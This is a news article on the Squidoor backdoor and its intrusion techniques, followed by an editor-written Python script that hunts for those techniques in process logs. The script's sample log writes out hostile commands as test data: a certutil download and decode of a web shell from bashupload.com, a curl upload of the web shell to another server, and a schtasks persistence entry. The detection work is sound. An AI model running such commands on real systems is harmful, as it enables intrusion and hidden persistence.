By Tushar, cyber security content editor at Cyber Security News.

A sophisticated backdoor called “Squidoor” is being deployed by suspected Chinese threat actors against organizations across South America and Southeast Asia. Palo Alto Networks researchers identified Squidoor as a multi-platform backdoor built specifically to operate undetected in highly monitored and secured networks. It exists in both Windows and Linux variants, showing the threat actor’s intent to compromise diverse environments regardless of operating system.

The malware is designed for stealth and gives attackers several ways to keep access to compromised networks while evading advanced security monitoring. Its command and control (C2) options include HTTP-based communication, reverse TCP/UDP connections, DNS tunneling, and even communication through the Microsoft Outlook mail API, so operators can adapt to whatever network environment and security controls they encounter. The Windows version supports ten different C2 protocols, while the Linux version supports nine.

Initial access is gained primarily by exploiting vulnerabilities in Internet Information Services (IIS) servers, followed by the deployment of multiple web shells that serve as persistent backdoors. “The threat actor stored some of the web shells on bashupload.com and downloaded and decoded them using certutil,” according to the research report. The attackers then used curl and Impacket to spread the web shells across different servers within compromised networks.

For persistence, Squidoor creates a scheduled task named “Microsoft\Windows\AppID\EPolicyManager” that executes the malicious shellcode at regular intervals, so the backdoor remains active even after system reboots. The task sits under a Microsoft-looking path, so a review of scheduled tasks on a suspected host should not skip it on the strength of its folder name.

Perhaps the most innovative aspect of Squidoor is its use of Microsoft Outlook as a covert communication channel. When configured for this method, the malware logs into the Microsoft identity platform using a hard-coded refresh token. It then queries the Outlook drafts folder for emails whose subject lines follow specific patterns containing randomly generated numbers, which let the operators tell different Squidoor implants apart. The contents of those emails pass through several processing stages: conversion with the CryptStringToBinaryA Windows API, Base64 decoding, a combination of AES and custom XOR decryption, and finally zlib decompression. Because this traffic terminates at Microsoft’s own cloud services, it will not stand out in destination-based network filtering; the more useful signals for defenders are on the identity and mailbox side, such as sign-ins using that refresh token and draft-folder activity that no user initiated.
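The following hunt is an added example written for this page; it is not code from the article or from the Palo Alto Networks report. It turns the indicators the article names (web shells fetched from bashupload.com and decoded with certutil, curl used to push them to other servers, and the “Microsoft\Windows\AppID\EPolicyManager” scheduled task) into rules run over process-creation events. It goes one step beyond the article by also flagging the IIS worker process (w3wp.exe) spawning a shell, which is what web shell execution on an IIS host looks like. The pipe-delimited log format, the host names, paths, URL and the sample events are all constructed for the example.

```python
"""Hunt for the Squidoor intrusion chain in process-creation logs.

Editor's example, not code from the article or the Palo Alto Networks report.
Assumed (constructed) log format, one event per line, pipe-delimited:
    timestamp|host|user|parent_image|command_line
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Hit:
    rule: str
    host: str
    cmd: str


# Child images that the IIS worker process should almost never spawn.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "curl.exe"}

# certutil used to fetch (-urlcache) or decode (-decode) a payload.
CERTUTIL_RE = re.compile(r"\bcertutil(\.exe)?\b.*\s-(decode|urlcache)\b", re.I)
BASHUPLOAD_RE = re.compile(r"bashupload\.com", re.I)
# curl with an upload option: the article says curl was used to spread web
# shells to other servers, so the interesting direction is outbound content.
CURL_UPLOAD_RE = re.compile(
    r"\bcurl(\.exe)?\b.*\s(-T|--upload-file|-F|--data-binary|-d|--data)\s", re.I)
# Task registration under the exact path the article reports.
SCHTASKS_RE = re.compile(
    r"\bschtasks(\.exe)?\b.*/create\b.*Microsoft\\Windows\\AppID\\EPolicyManager", re.I)


def child_image(cmd: str) -> str:
    """Return the executable name from a command line, e.g. 'cmd.exe'."""
    tokens = cmd.strip().split()
    if not tokens:
        return ""
    first = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    return first if first.endswith(".exe") else first + ".exe"


RULES = [
    ("iis_worker_spawning_shell",
     lambda ev: ev["parent"].lower().endswith("\\w3wp.exe")
     and child_image(ev["cmd"]) in SHELL_CHILDREN),
    ("certutil_download_or_decode", lambda ev: bool(CERTUTIL_RE.search(ev["cmd"]))),
    ("bashupload_staging_host", lambda ev: bool(BASHUPLOAD_RE.search(ev["cmd"]))),
    ("curl_upload_to_server", lambda ev: bool(CURL_UPLOAD_RE.search(ev["cmd"]))),
    ("schtasks_epolicymanager", lambda ev: bool(SCHTASKS_RE.search(ev["cmd"]))),
]


def parse(line: str):
    """Split one pipe-delimited event; the command line may itself contain '|'."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, user, parent, cmd = parts
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}


def hunt(log_text: str):
    """Run every rule over every event and return one Hit per (rule, event)."""
    hits = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        ev = parse(line)
        if ev is None:
            continue
        for name, pred in RULES:
            if pred(ev):
                hits.append(Hit(name, ev["host"], ev["cmd"]))
    return hits


def summarize(hits):
    """Count hits per rule; a host with several rules firing deserves a look."""
    return Counter(h.rule for h in hits)


# Constructed sample events: the first four mimic the chain in the article,
# the last two are benign look-alikes that must not fire.
SAMPLE_LOG = r"""
2025-03-10T09:12:01Z|web01|IIS APPPOOL\DefaultAppPool|C:\Windows\System32\inetsrv\w3wp.exe|cmd.exe /c certutil -urlcache -split -f https://bashupload.com/r3Kq1/sh.txt C:\inetpub\wwwroot\s.b64
2025-03-10T09:12:03Z|web01|IIS APPPOOL\DefaultAppPool|C:\Windows\System32\inetsrv\w3wp.exe|cmd.exe /c certutil -decode C:\inetpub\wwwroot\s.b64 C:\inetpub\wwwroot\s.aspx
2025-03-10T09:15:44Z|web01|CORP\svc_deploy|C:\Windows\System32\cmd.exe|curl.exe -T C:\inetpub\wwwroot\s.aspx http://web02/uploads/
2025-03-10T09:20:10Z|web01|NT AUTHORITY\SYSTEM|C:\Windows\System32\cmd.exe|schtasks /create /tn "\Microsoft\Windows\AppID\EPolicyManager" /tr C:\ProgramData\x.exe /sc minute /mo 30 /ru SYSTEM
2025-03-10T09:30:00Z|web01|CORP\jdoe|C:\Windows\explorer.exe|curl.exe https://example.com/ -o page.html
2025-03-10T09:31:00Z|web01|NT AUTHORITY\SYSTEM|C:\Windows\System32\svchost.exe|certutil -verify C:\temp\cert.cer
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"{hit.rule:30} {hit.host}  {hit.cmd}")
    print(dict(summarize(hunt(SAMPLE_LOG))))
```

The rules are deliberately narrow, matching only what the article reports, so the benign curl download and the certutil -verify call in the sample stay silent. On a real estate, feed it Sysmon Event ID 1 or EDR process-creation data in the same five fields and treat a host where several rules fire within minutes as the starting point for a web shell investigation.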
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 12 Mar 2025 08:40:17 +0000